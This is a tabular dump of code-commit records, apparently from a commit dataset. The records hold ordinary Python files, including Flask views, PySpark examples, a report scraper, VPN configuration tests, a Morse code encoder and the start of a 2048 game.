commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
c15c4a663c257cad6763cf92c50b7ad706017c74 | Remove extraneous imports in the base view package | evesrp/views/__init__.py | evesrp/views/__init__.py | from flask import render_template
from flask.ext.login import login_required
from .. import app
@app.route('/')
@login_required
def index():
return render_template('base.html')
| from collections import OrderedDict
from urllib.parse import urlparse
import re
from flask import render_template, redirect, url_for, request, abort, jsonify,\
flash, Markup, session
from flask.views import View
from flask.ext.login import login_user, login_required, logout_user, \
current_user
from flask.ext.wtf import Form
from flask.ext.principal import identity_changed, AnonymousIdentity
from sqlalchemy.orm.exc import NoResultFound
from wtforms.fields import StringField, PasswordField, SelectField, \
SubmitField, TextAreaField, HiddenField
from wtforms.fields.html5 import URLField, DecimalField
from wtforms.widgets import HiddenInput
from wtforms.validators import InputRequired, ValidationError, AnyOf, URL
from .. import app, auth_methods, db, requests_session, killmail_sources
from ..auth import SubmitRequestsPermission, ReviewRequestsPermission, \
PayoutRequestsPermission, admin_permission
from ..auth.models import User, Group, Division, Pilot
from ..models import Request, Modifier, Action
@app.route('/')
@login_required
def index():
return render_template('base.html')
| Python | 0 |
d40b4c250f7d1c0c6a6c198b3e1ea69e0049830e | Create syb.py | syb.py | syb.py | # -*- coding: utf-8 -*-
"""
Star Yuuki Bot
~~~~~~~~~~~
LineClient for sending and receiving message from LINE server.
Copyright: (c) 2015 SuperSonic Software Foundation and Star Inc.
Website:
SuperSonic Software Foundation: http://supersonic-org.cf
Star Inc.: http://startw.cf
License: Mozilla Public License 2.0
"""
print "Come Soon..."
| Python | 0.000039 | |
100d30d4f541541a63e4b05adfbd9644d70af453 | Add the lovecat utils. | src/crosscat/lovecat.py | src/crosscat/lovecat.py | # -*- coding: utf-8 -*-
# Copyright (c) 2015-2016 MIT Probabilistic Computing Project
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
def _create_metadata(state):
"""Create M_c from cgpm.state.State"""
T = state.X
outputs = state.outputs
cctypes = state.cctypes()
distargs = state.distargs()
assert len(T) == len(outputs) == len(cctypes) == len(distargs)
assert all(c in ['normal', 'categorical'] for c in cctypes)
ncols = len(outputs)
def create_metadata_numerical():
return {
unicode('modeltype'): unicode('normal_inverse_gamma'),
unicode('value_to_code'): {},
unicode('code_to_value'): {},
}
def create_metadata_categorical(col, k):
categories = filter(lambda v: not np.isnan(v), sorted(set(T[col])))
assert all(0 <= c < k for c in categories)
codes = [unicode('%d') % (c,) for c in categories]
ncodes = range(len(codes))
return {
unicode('modeltype'):
unicode('symmetric_dirichlet_discrete'),
unicode('value_to_code'):
dict(zip(map(unicode, ncodes), codes)),
unicode('code_to_value'):
dict(zip(codes, ncodes)),
}
column_names = [unicode('c%d') % (i,) for i in outputs]
# Convert all numerical datatypes to normal for lovecat.
column_metadata = [
create_metadata_numerical() if cctype != 'categorical' else\
create_metadata_categorical(output, distarg['k'])
for output, cctype, distarg in zip(outputs, cctypes, distargs)
]
return {
unicode('name_to_idx'):
dict(zip(column_names, range(ncols))),
unicode('idx_to_name'):
dict(zip(map(unicode, range(ncols)), column_names)),
unicode('column_metadata'):
column_metadata,
}
def _crosscat_data(state, M_c):
"""Create T from cgpm.state.State"""
T = state.X
def crosscat_value_to_code(val, col):
if np.isnan(val):
return val
# For hysterical raisins, code_to_value and value_to_code are
# backwards, so to convert from a raw value to a crosscat value we
# need to do code->value.
lookup = M_c['column_metadata'][col]['code_to_value']
if lookup:
assert unicode(int(val)) in lookup
return float(lookup[unicode(int(val))])
else:
return val
ordering = sorted(T.keys())
rows = range(len(T[ordering[0]]))
return [[crosscat_value_to_code(T[col][row], i) for (i, col) in
enumerate(ordering)] for row in rows]
def _crosscat_X_D(state, M_c):
"""Create X_D from cgpm.state.State"""
view_assignments = state.Zv().values()
views_unique = sorted(set(view_assignments))
cluster_assignments = [state.views[v].Zr().values() for v in views_unique]
cluster_assignments_unique = [sorted(set(assgn))
for assgn in cluster_assignments]
cluster_assignments_to_code = [{k:i for (i,k) in enumerate(assgn)}
for assgn in cluster_assignments_unique]
cluster_assignments_remapped = [
[coder[v] for v in assgn] for (coder, assgn)
in zip(cluster_assignments_to_code, cluster_assignments)]
return cluster_assignments_remapped
def _crosscat_X_L(state, X_D, M_c):
"""Create X_L from cgpm.state.State"""
# -- Generates X_L['column_hypers'] --
def column_hypers_numerical(index, hypers):
assert state.cctypes()[index] != 'categorical'
return {
unicode('fixed'): 0.0,
unicode('mu'): hypers['m'],
unicode('nu'): hypers['nu'],
unicode('r'): hypers['r'],
unicode('s'): hypers['s'],
}
def column_hypers_categorical(index, hypers):
assert state.cctypes()[index] == 'categorical'
K = len(M_c['column_metadata'][index]['code_to_value'])
assert K > 0
return {
unicode('fixed'): 0.0,
unicode('dirichlet_alpha'): hypers['alpha'],
unicode('K'): K
}
# Retrieve the column_hypers.
column_hypers = [
column_hypers_numerical(i, state.dims()[i].hypers)
if cctype != 'categorical'
else column_hypers_categorical(i, state.dims()[i].hypers)
for i, cctype in enumerate(state.cctypes())
]
# -- Generates X_L['column_partition'] --
view_assignments = state.Zv().values()
views_unique = sorted(set(view_assignments))
views_to_code = {v:i for (i,v) in enumerate(views_unique)}
views_remapped = [views_to_code[v] for v in view_assignments]
counts = list(np.bincount(views_remapped))
assert 0 not in counts
column_partition = {
unicode('assignments'): views_remapped,
unicode('counts'): counts,
unicode('hypers'): {unicode('alpha'): state.alpha()}
}
# -- Generates X_L['view_state'] --
def view_state(v):
view = state.views[v]
row_partition = X_D[views_to_code[v]]
# Generate X_L['view_state'][v]['column_component_suffstats']
numcategories = len(set(row_partition))
column_component_suffstats = [
[{} for c in xrange(numcategories)]
for d in view.dims]
# Generate X_L['view_state'][v]['column_names']
column_names = \
[unicode('c%d' % (o,)) for o in state.views[0].outputs[1:]]
# Generate X_L['view_state'][v]['row_partition_model']
counts = list(np.bincount(row_partition))
assert 0 not in counts
return {
unicode('column_component_suffstats'):
column_component_suffstats,
unicode('column_names'):
column_names,
unicode('row_partition_model'): {
unicode('counts'): counts,
unicode('hypers'): {unicode('alpha'): view.alpha()}
}
}
view_states = [view_state(v) for v in state.views.keys()]
# XXX TODO convert me to dictionary.
return {
unicode('column_hypers'): column_hypers,
unicode('column_partition'): column_partition,
unicode('view_state'): view_states
}
| Python | 0.000001 | |
774877893b9f94711b717d01b896deefe65eb211 | create file | app.py | app.py | """
@import rdflib external lib
"""
import rdflib
jsonldData = open("LearningObjectsExpanded.jsonld").read()
queryData = open("findRecommendations.query").read()
graph = rdflib.Graph()
graph.parse(data=jsonldData,format='json-ld')
results = graph.query(queryData)
for result in results:
print(result)
| Python | 0.000003 | |
921221e4ad7d74b6f9d8b0b75417fe84fd01715f | Add script to concatenate all titers to one file tracking source/passage Fixes #76 | tdb/concatenate.py | tdb/concatenate.py | import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--files', nargs='*', default=[], help="tsvs that will be concatenated")
parser.add_argument('-o', '--output', type=str, default="data/titers_complete.tsv")
def concat(files,out):
with open(out, 'w') as o:
for filename in files:
print "Concatenating and annotating %s into %s." % (filename, out)
if "cdc" in filename.lower():
source = "cdc"
elif "crick" in filename.lower():
source = "crick"
else:
source = "none"
if "egg" in filename.lower():
passage = "egg"
elif "cell" in filename.lower():
passage = "egg"
else:
passage = "none"
with open(filename, 'r') as f:
for line in f.readlines():
print line
line = line.strip()
l = "%s\t%s\t%s\n" % (line, source, passage)
o.write(l)
if __name__=="__main__":
args = parser.parse_args()
concat(args.files, args.output)
| Python | 0.000003 | |
c26d570e949483224b694574120e37a215dcc348 | Add dataframewriter api example to python graphene (#4520) | ppml/trusted-big-data-ml/python/docker-graphene/examples/sql_dataframe_writer_example.py | ppml/trusted-big-data-ml/python/docker-graphene/examples/sql_dataframe_writer_example.py | from pyspark.sql.functions import *
from pyspark.sql import Row, Window, SparkSession, SQLContext
from pyspark.sql.types import IntegerType, FloatType, StringType
from pyspark.sql import functions as F
from pyspark.sql.functions import rank, min, col, mean
import random
import os
import tempfile
def sql_dataframe_writer_api(spark):
print("Start running dataframe writer API")
sc = spark.sparkContext
sqlContext = SQLContext(sc)
df = spark.createDataFrame([(2, "Alice"), (5, "Bob")], ["age", "name"])
# bucketBy and saveAsTable
# make sure that this is no work/spark-warehouse/bucketed_table/ under current path
df.write.format('parquet').bucketBy(100, 'age', 'name').mode("overwrite").saveAsTable('bucketed_table', path="work/spark-warehouse/bucketed_table/")
print("bucketBy and saveAsTable API finished")
# csv and option
df = spark.createDataFrame([(2, "Alice"), (5, "Bob")], ["age", "name"])
df.write.option('header','true').csv(os.path.join(tempfile.mkdtemp(), 'data'))
print("csv and option API finished")
# format
df.write.format('json').save(os.path.join(tempfile.mkdtemp(), 'data'))
print("format API finished")
# insertInto
df2 = spark.createDataFrame([(3, "Alice")], ["age", "name"])
df2.write.insertInto("bucketed_table")
print("insertInto API finished")
# jdbc
# json
df.write.json(os.path.join(tempfile.mkdtemp(), 'data'))
print("json API finished")
# mode
df.write.mode('append').parquet(os.path.join(tempfile.mkdtemp(), 'data'))
print("mode API finished")
# orc
orc_df = spark.read.orc('/ppml/trusted-big-data-ml/work/spark-2.4.6/python/test_support/sql/orc_partitioned')
orc_df.write.orc(os.path.join(tempfile.mkdtemp(), 'data'))
print("orc API finished")
# parquet
df.write.parquet(os.path.join(tempfile.mkdtemp(), 'data'))
print("parquet API finished")
# partitionBy
df.write.partitionBy('age').parquet(os.path.join(tempfile.mkdtemp(), 'data'))
print("partitionBy API finished")
# save
df.write.mode("append").save(os.path.join(tempfile.mkdtemp(), 'data'))
print("save API finished")
# sortBy
# make sure that this is no work/spark-warehouse/sorted_bucketed_table/ under current path
df.write.format('parquet').bucketBy(100, 'name').sortBy('age').mode("overwrite").saveAsTable('sorted_bucketed_table', path="work/spark-warehouse/sorted_bucketed_table/")
print("sortBy API finished")
# text
df = spark.createDataFrame([1.0, 2.0, 3.0], StringType())
df.write.text(os.path.join(tempfile.mkdtemp(), 'data'))
print("text API finished")
print("Finish running dataframe writer API")
if __name__ == "__main__":
spark = SparkSession \
.builder \
.appName("Python Spark SQL Dataframe Writer example") \
.config("spark.some.config.option", "some-value") \
.getOrCreate()
sql_dataframe_writer_api(spark)
| Python | 0 | |
ad489edc8059b75d9ec78d0aeb03ac3592b93923 | Add Federal Labor Relations Authority. | inspectors/flra.py | inspectors/flra.py | #!/usr/bin/env python
import datetime
import logging
import os
from urllib.parse import urljoin
from bs4 import BeautifulSoup
from utils import utils, inspector
# https://www.flra.gov/OIG
# Oldest report: 1999
# options:
# standard since/year options for a year range to fetch from.
#
# Notes for IG's web team:
#
AUDIT_REPORTS_URL = "https://www.flra.gov/IG_audit-reports"
INTERNAL_REVIEWS_URL = "https://www.flra.gov/IG_internal-reviews"
QA_REVIEWS_URL = "https://www.flra.gov/OIG_QA_Reviews"
SEMIANNUAL_REPORTS_URL = "https://www.flra.gov/IG_semi-annual_reports"
def run(options):
year_range = inspector.year_range(options)
# Pull the reports
for url in [AUDIT_REPORTS_URL, INTERNAL_REVIEWS_URL, QA_REVIEWS_URL, SEMIANNUAL_REPORTS_URL]:
doc = BeautifulSoup(utils.download(url))
results = doc.select("div.node ul li")
for result in results:
report = report_from(result, url, year_range)
if report:
inspector.save_report(report)
def report_from(result, landing_url, year_range):
title = result.text.strip()
if 'Non-Public Report' in title:
unreleased = True
report_url = None
report_id = "-".join(title.split())
else:
unreleased = False
link = result.find("a")
# Some reports have incorrect relative paths
relative_report_url = link.get('href').replace("../", "")
report_url = urljoin(landing_url, relative_report_url)
report_filename = report_url.split("/")[-1]
report_id, _ = os.path.splitext(report_filename)
estimated_date = False
try:
published_on = datetime.datetime.strptime(title, '%B %Y')
except ValueError:
# For reports where we can only find the year, set them to Nov 1st of that year
published_on_year = int(result.find_previous("p").text.strip())
published_on = datetime.datetime(published_on_year, 11, 1)
estimated_date = True
if published_on.year not in year_range:
logging.debug("[%s] Skipping, not in requested range." % report_url)
return
report = {
'inspector': 'flra',
'inspector_url': 'https://www.flra.gov/OIG',
'agency': 'flra',
'agency_name': 'Federal Labor Relations Authority',
'file_type': 'pdf',
'report_id': report_id,
'url': report_url,
'title': title,
'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"),
}
if estimated_date:
report['estimated_date'] = estimated_date
if unreleased:
report['unreleased'] = unreleased
report['landing_url'] = landing_url
return report
utils.run(run) if (__name__ == "__main__") else None
| Python | 0 | |
241cc8fc668b9f6c38d23a97d9ff28cc4c481bf3 | Create github_watchdog,py | github_watchdog.py | github_watchdog.py | #!/usr/bin/bash
| Python | 0.000126 | |
45af6f13e302fb4e790f8ec5a5730f25c6a9450b | add new segmenter debugging script | kraken/contrib/heatmap_overlay.py | kraken/contrib/heatmap_overlay.py | #! /usr/bin/env python
"""
Produces semi-transparent neural segmenter output overlays
"""
import sys
import torch
import numpy as np
from PIL import Image
from kraken.lib import segmentation, vgsl, dataset
import torch.nn.functional as F
from typing import *
import glob
from os.path import splitext, exists
model = vgsl.TorchVGSLModel.load_model(sys.argv[1])
model.eval()
batch, channels, height, width = model.input
transforms = dataset.generate_input_transforms(batch, height, width, channels, 0, valid_norm=False)
imgs = sys.argv[2:]
torch.set_num_threads(1)
for img in imgs:
print(img)
im = Image.open(img)
with torch.no_grad():
o = model.nn(transforms(im).unsqueeze(0))
o = F.interpolate(o, size=im.size[::-1])
o = o.squeeze().numpy()
heat = Image.fromarray((o[1]*255).astype('uint8'))
heat.save(splitext(img)[0] + '.heat.png')
overlay = Image.new('RGBA', im.size, (0, 130, 200, 255))
Image.composite(overlay, im.convert('RGBA'), heat).save(splitext(img)[0] + '.overlay.png')
del o
del im
| Python | 0 | |
d39a3bae3f6ca66df044e725cd164082170f4ec7 | Modify the config file. | snippet/lib/python/config.py | snippet/lib/python/config.py | # coding: utf-8
from oslo_config import cfg
from oslo_log import log
CONF = cfg.CONF
_ROOTS = ["root"]
_DEFAULT_LOG_LEVELS = ['root=INFO']
_DEFAULT_LOG_FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
def parse_args(argv, project, version=None, default_config_files=None,
default_log_format=None, default_log_levels=None):
if project not in _ROOTS:
_DEFAULT_LOG_LEVELS.append('%s=INFO' % project)
_ROOTS.append(project)
log_fmt = default_log_format if default_log_format else _DEFAULT_LOG_FORMAT
log_lvl = default_log_levels if default_log_levels else _DEFAULT_LOG_LEVELS
log.set_defaults(log_fmt, log_lvl)
log.register_options(CONF)
# (TODO): Configure the options of the other libraries, which must be called
# before parsing the configuration file.
CONF(argv[1:], project=project, version=version,
default_config_files=default_config_files)
| Python | 0 | |
be2f50aae308377dbabd66b5ec78ffb2bd8ae218 | Add tse_number as index | politicos/migrations/versions/488fc5ad2ffa_political_party_add_tse_number_as_index.py | politicos/migrations/versions/488fc5ad2ffa_political_party_add_tse_number_as_index.py | """political party: add tse_number as index
Revision ID: 488fc5ad2ffa
Revises: 192bd4ccdacb
Create Date: 2015-07-08 13:44:38.208146
"""
# revision identifiers, used by Alembic.
revision = '488fc5ad2ffa'
down_revision = '192bd4ccdacb'
from alembic import op
def upgrade():
op.create_index('idx_tse_number', 'political_party', ['tse_number'])
def downgrade():
op.drop_index('idx_tse_number', 'political_party')
| Python | 0.002058 | |
96ecfaa423b2d7829fcda0e56e9adba41a4c6819 | Add unit_tests/s2s_vpn | unit_tests/s2s_vpn.py | unit_tests/s2s_vpn.py | import logging
import fmcapi
import time
def test_ftds2svpns(fmc):
logging.info('Testing FTDS2SVPNs class. Requires at least one registered device.')
starttime = str(int(time.time()))
namer = f'_fmcapi_test_{starttime}'
# Create a Site2Site VPN Policy
vpnpol1 = fmcapi.FTDS2SVPNs(fmc=fmc, name=namer)
vpnpol1.topologyType = "POINT_TO_POINT"
vpnpol1.ikeV1Enabled = True
vpnpol1.ikeV2Enabled = False
vpnpol1.post()
vpnpol1.get()
# Create some network objects for the encryption domains
obj1 = fmcapi.Networks(fmc=fmc)
obj1.name = '_net1_site1'
obj1.value = '10.255.0.0/24'
obj1.post()
time.sleep(1)
obj2 = fmcapi.Networks(fmc=fmc)
obj2.name = '_net2_site1'
obj2.value = '10.255.1.0/24'
obj2.post()
time.sleep(1)
obj3 = fmcapi.Networks(fmc=fmc)
obj3.name = '_net1_site2'
obj3.value = '10.255.2.0/24'
obj3.post()
time.sleep(1)
# Create Phase 1 settings
# There is no way to search by name, so we just find the iksettings object inside the vpn policy
ike1_json = fmcapi.IKESettings(fmc=fmc)
ike1_json.vpn_policy(pol_name=namer)
items = ike1_json.get()['items'][0]
ike1 = fmcapi.IKESettings(fmc=fmc)
ike1.vpn_policy(pol_name=namer)
ike1.id = items['id']
ike1.get()
ike1.ike_policy(pol_name="preshared_sha_aes192_dh5_10")
ike1.put()
#Create Phase 2 settings
# There is no way to search by name, so we just find the ipsecsettings object inside the vpn policy
ipsec1_json = fmcapi.IPSecSettings(fmc=fmc)
ipsec1_json.vpn_policy(pol_name=namer)
items = ipsec1_json.get()['items'][0]
ipsec1 = fmcapi.IPSecSettings(fmc=fmc)
ipsec1.vpn_policy(pol_name=namer)
ipsec1.id = items['id']
ipsec1.get()
ipsec1.ipsec_policy(pol_name="tunnel_aes256_sha")
ipsec1.put()
#Add vpn peers
#FTD in HA mode should use the name of logical HA device
endp1 = fmcapi.Endpoints(fmc=fmc)
endp1.peerType = "PEER"
endp1.connectionType = "BIDIRECTIONAL"
endp1.vpn_policy(pol_name=namer)
endp1.endpoint(action='add', device_name="_ha_name")
endp1.vpn_interface(device_name='_ha_name', ifname="OUTSIDE1")
endp1.encryption_domain(action='add', names=[
"_net1_site1", "_net2_site1"])
endp2 = fmcapi.Endpoints(fmc=fmc)
endp2.peerType = "PEER"
endp2.connectionType = "BIDIRECTIONAL"
endp2.vpn_policy(pol_name=namer)
endp2.endpoint(action='add', device_name="_device_name")
endp2.vpn_interface(device_name='device_name', ifname="OUTSIDE1")
endp2.encryption_domain(action='add', names=[
"_net1_site2"])
endp1.post()
endp2.post()
time.sleep(30)
vpnpol1.delete()
obj1.delete()
obj2.delete()
obj3.delete() | Python | 0.000001 | |
75756f20d4b63daa8425609620e4b32dcb9faab4 | Add cryptography unit with morse code functions | units/cryptography.py | units/cryptography.py |
from .errors import UnitOutputError
character_to_morse = {
'A': ".-", 'B': "-...", 'C': "-.-.", 'D': "-..", 'E': '.', 'F': "..-.", 'G': "--.", 'H': "....",
'I': "..", 'J': ".---", 'K': "-.-", 'L': ".-..", 'M': "--", 'N': "-.", 'O': "---", 'P': ".--.",
'Q': "--.-", 'R': ".-.", 'S': "...", 'T': '-', 'U': "..-", 'V': "...-", 'W': ".--", 'X': "-..-",
'Y': "-.--", 'Z': "--..", '0': "----", '1': ".----", '2': "..---", '3': "...--", '4': "....-",
'5': ".....", '6': "-....", '7': "--...", '8': "---..", '9': "----.", '.': ".-.-.-", ',': "--..--",
':': "---...", '?': "..--..", "'": ".---.", '-': "-....-", '/': "-..-.", '!': "-.-.--",
'(': "-.--.", ')': "-.--.-", '&': ".-...", ';': "-.-.-.", '=': "-...-", '+': ".-.-.",
'_': "..--.-", '"': ".-..-.", '$': "...-..-", '@': ".--.-.", ' ': '/'
}
morse_to_character = {value: key for key, value in character_to_morse.items()}
def encode_morse_code(message):
try:
return ' '.join(character_to_morse[character] for character in message.upper())
except KeyError as e:
raise UnitOutputError(f"Unable to encode {e}")
def decode_morse_code(message):
try:
return ' '.join(''.join(morse_to_character[character] for character in word.split(' ')) for word in message.split(" / "))
except KeyError as e:
raise UnitOutputError(f"Unable to decode {e}")
| Python | 0.000001 | |
93b3cfb5dd465f956fa6c9ceb09be430684c85ae | Add two pass solution | leetcode/q019/solution.py | leetcode/q019/solution.py | """
Given a linked list, remove the n-th node from the end of list and return its head.
Example:
Given linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes 1->2->3->5.
Note:
Given n will always be valid.
"""
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
d = 1
current = head.next
while current:
d += 1
current = current.next
removal_index = d - n
if removal_index <= 0:
return head.next
counter = 1
prior = head
current = head.next
while counter < removal_index:
prior = current
current = prior.next
counter += 1
if current.next is None:
prior.next = None
else:
following = current.next
prior.next = following
return head
| Python | 0.000031 | |
295823afe17cedaa1934afbcd19d955974089c63 | Add producer written in Python | python/send.py | python/send.py | #!/usr/bin/env python
import pika
# Host in which RabbitMQ is running.
HOST = 'localhost'
# Name of the queue.
QUEUE = 'pages'
# The message to send.
MESSAGE = 'Hi there! This is a test message =)'
# Getting the connection using pika.
# Creating the channel.
# Declaring the queue.
connection = pika.BlockingConnection(pika.ConnectionParameters(HOST))
channel = connection.channel()
channel.queue_declare(queue=QUEUE)
# Sends the 'MESSAGE' to the queue.
# Default empty 'exchange' with 'routing_key' equal to the queue name
# will route the message to that queue.
channel.publish(exchange='', routing_key=QUEUE, body=MESSAGE)
# The connection is closed.
connection.close()
| Python | 0.000005 | |
04c8b38ac43c84abe64858cfd22a721e803b87eb | add mocked tests for internal /run folder | tests/core/test_run_files.py | tests/core/test_run_files.py | # stdlib
import os
import shlex
import signal
import subprocess
import time
import unittest
# 3p
import mock
from nose.plugins.attrib import attr
# Mock gettempdir for testing
import tempfile; tempfile.gettempdir = mock.Mock(return_value='/a/test/tmp/dir')
# project
# Mock _windows_commondata_path for testing
import config; config._windows_commondata_path = mock.Mock(return_value='./windows_commondata')
from utils.pidfile import PidFile
from checks.check_status import AgentStatus
class TestRunFiles(unittest.TestCase):
""" Tests that runfiles (.pid, .sock, .pickle etc.) are written to internal agent folders"""
# Mac run directory expected location
_my_dir = os.path.dirname(os.path.abspath(__file__))
_mac_run_dir = '/'.join(_my_dir.split('/')[:-4])
def setUp(self):
self.agent_daemon = None
def tearDown(self):
if self.agent_daemon:
args = shlex.split('python agent.py stop')
subprocess.Popen(args).communicate()
@mock.patch('utils.platform.Platform.is_win32', return_value=True)
def test_agent_status_pickle_file_win32(self, *mocks):
''' Test pickle file location on win32 '''
expected_path = os.path.join('.', 'windows_commondata', 'Datadog', 'AgentStatus.pickle')
# check AgentStatus pickle created
self.assertEqual(AgentStatus._get_pickle_path(), expected_path)
@mock.patch('utils.pidfile.PidFile.get_dir', return_value=_mac_run_dir)
@mock.patch('utils.platform.Platform.is_win32', return_value=False)
@mock.patch('utils.platform.Platform.is_mac', return_value=True)
def test_agent_status_pickle_file_mac_dmg(self, *mocks):
''' Test pickle file location when running a Mac DMG install '''
expected_path = os.path.join(self._mac_run_dir, 'AgentStatus.pickle')
self.assertEqual(AgentStatus._get_pickle_path(), expected_path)
@mock.patch('utils.platform.Platform.is_win32', return_value=False)
@mock.patch('utils.platform.Platform.is_mac', return_value=True)
def test_agent_status_pickle_file_mac_source(self, *mocks):
''' Test pickle file location when running a Mac source install '''
expected_path = os.path.join('/a/test/tmp/dir', 'AgentStatus.pickle')
self.assertEqual(AgentStatus._get_pickle_path(), expected_path)
| Python | 0 | |
cf9299aad62828f1cd116403076b2a6b086721d8 | add meta utilities | flask_ember/util/meta.py | flask_ember/util/meta.py | import inspect
def get_class_fields(klass, predicate=None):
return [(name, field) for name, field in klass.__dict__.items()
if (predicate(name, field) if predicate else True)]
def get_fields(klass, predicate=None):
fields = list()
for base in inspect.getmro(klass)[::-1]:
fields.extend(get_class_fields(base, predicate))
return fields
def get_methods(klass):
return get_fields(klass, lambda name, field: inspect.isfunction(field))
| Python | 0.000001 | |
481a920fe89ea7f0e518b8cf815f966715b20ca3 | add new package : activemq (#14142) | var/spack/repos/builtin/packages/activemq/package.py | var/spack/repos/builtin/packages/activemq/package.py | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Activemq(Package):
"""
Apache ActiveMQ is a high performance Apache 2.0 licensed Message Broker
and JMS 1.1 implementation.
"""
homepage = "https://archive.apache.org/dist/activemq"
url = "https://archive.apache.org/dist/activemq/5.14.0/apache-activemq-5.14.0-bin.tar.gz"
version('5.14.0', sha256='81c623465af277dd50a141a8d9308d6ec8e1b78d9019b845873dc12d117aa9a6')
def install(self, spec, prefix):
install_tree('.', prefix)
| Python | 0 | |
6b9adf9f00b481562cedf2debc5aede947734744 | remove dot | addons/account_analytic_analysis/cron_account_analytic_account.py | addons/account_analytic_analysis/cron_account_analytic_account.py | #!/usr/bin/env python
from osv import osv
from mako.template import Template
import time
try:
import cStringIO as StringIO
except ImportError:
import StringIO
import tools
MAKO_TEMPLATE = u"""Hello ${user.name},
Here is a list of contracts that have to be renewed for two
possible reasons:
- the end of contract date is passed
- the customer consumed more hours than expected
Can you contact the customer in order to sell a new or renew its contract.
The contract has been set with a pending state, can you update the status
of the analytic account following this rule:
- Set Done: if the customer does not want to renew
- Set Open: if the customer purchased an extra contract
Here is the list of contracts to renew:
% for partner, accounts in partners.iteritems():
* ${partner.name}
% for account in accounts:
- Name: ${account.name}
% if account.quantity_max != 0.0:
- Quantity: ${account.quantity}/${account.quantity_max} hours
% endif
- Dates: ${account.date_start} to ${account.date and account.date or '???'}
- Contacts:
${account.partner_id.name}, ${account.partner_id.phone}, ${account.partner_id.email}
% endfor
% endfor
You can use the report in the menu: Sales > Invoicing > Overdue Accounts
Regards,
--
OpenERP
"""
class analytic_account(osv.osv):
_inherit = 'account.analytic.account'
def cron_account_analytic_account(self, cr, uid, context=None):
domain = [
('name', 'not ilike', 'maintenance'),
('partner_id', '!=', False),
('user_id', '!=', False),
('user_id.user_email', '!=', False),
('state', 'in', ('draft', 'open')),
'|', ('date', '<', time.strftime('%Y-%m-%d')), ('date', '=', False),
]
account_ids = self.search(cr, uid, domain, context=context, order='name asc')
accounts = self.browse(cr, uid, account_ids, context=context)
users = dict()
for account in accounts:
users.setdefault(account.user_id, dict()).setdefault(account.partner_id, []).append(account)
account.write({'state' : 'pending'}, context=context)
for user, data in users.iteritems():
subject = '[OPENERP] Reporting: Analytic Accounts'
body = Template(MAKO_TEMPLATE).render_unicode(user=user, partners=data)
tools.email_send('noreply@openerp.com', [user.user_email, ], subject, body)
return True
analytic_account()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| #!/usr/bin/env python
from osv import osv
from mako.template import Template
import time
try:
import cStringIO as StringIO
except ImportError:
import StringIO
import tools
MAKO_TEMPLATE = u"""Hello ${user.name},
Here is a list of contracts that have to be renewed for two
possible reasons:
- the end of contract date is passed
- the customer consumed more hours than expected
Can you contact the customer in order to sell a new or renew its contract.
The contract has been set with a pending state, can you update the status
of the analytic account following this rule:
- Set Done: if the customer does not want to renew
- Set Open: if the customer purchased an extra contract
Here is the list of contracts to renew:
% for partner, accounts in partners.iteritems():
* ${partner.name}
% for account in accounts:
- Name: ${account.name}
% if account.quantity_max != 0.0:
- Quantity: ${account.quantity}/${account.quantity_max} hours
% endif
- Dates: ${account.date_start} to ${account.date and account.date or '???'}
- Contacts:
. ${account.partner_id.name}, ${account.partner_id.phone}, ${account.partner_id.email}
% endfor
% endfor
You can use the report in the menu: Sales > Invoicing > Overdue Accounts
Regards,
--
OpenERP
"""
class analytic_account(osv.osv):
_inherit = 'account.analytic.account'
def cron_account_analytic_account(self, cr, uid, context=None):
domain = [
('name', 'not ilike', 'maintenance'),
('partner_id', '!=', False),
('user_id', '!=', False),
('user_id.user_email', '!=', False),
('state', 'in', ('draft', 'open')),
'|', ('date', '<', time.strftime('%Y-%m-%d')), ('date', '=', False),
]
account_ids = self.search(cr, uid, domain, context=context, order='name asc')
accounts = self.browse(cr, uid, account_ids, context=context)
users = dict()
for account in accounts:
users.setdefault(account.user_id, dict()).setdefault(account.partner_id, []).append(account)
account.write({'state' : 'pending'}, context=context)
for user, data in users.iteritems():
subject = '[OPENERP] Reporting: Analytic Accounts'
body = Template(MAKO_TEMPLATE).render_unicode(user=user, partners=data)
tools.email_send('noreply@openerp.com', [user.user_email, ], subject, body)
return True
analytic_account()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| Python | 0.000012 |
2aa7a6260d9d5a74ee81677be2bd5f97774f9116 | Add tests for internal gregorian functions. | calexicon/internal/tests/test_gregorian.py | calexicon/internal/tests/test_gregorian.py | import unittest
from calexicon.internal.gregorian import is_gregorian_leap_year
class TestGregorian(unittest.TestCase):
def test_is_gregorian_leap_year(self):
self.assertTrue(is_gregorian_leap_year(2000))
self.assertTrue(is_gregorian_leap_year(1984))
self.assertFalse(is_gregorian_leap_year(1900))
self.assertFalse(is_gregorian_leap_year(1901))
| Python | 0 | |
9524230502819a3bfaa670e344e6760f61afbcbe | Create 2048.py | 2048.py | 2048.py | #coding by forsenlol
#!/usr/bin/env python
import pygame
from random import randint
from pygame import font
pygame.font.init()
class Window:
__name = "2048"
__size = [450, 450]
__background_color = "#AA9C99"
__square_size = [98, 98]
__square_clean_color = "#BBADA0"
__square_space = 12
x_pos = y_pos = __square_space
play_block = []
square_font_name = font.Font(None, 25)
def new_game(self):
self.screen = pygame.display.set_mode(self.__size)
pygame.display.set_caption(self.__name)
self.bg = pygame.Surface(self.__size)
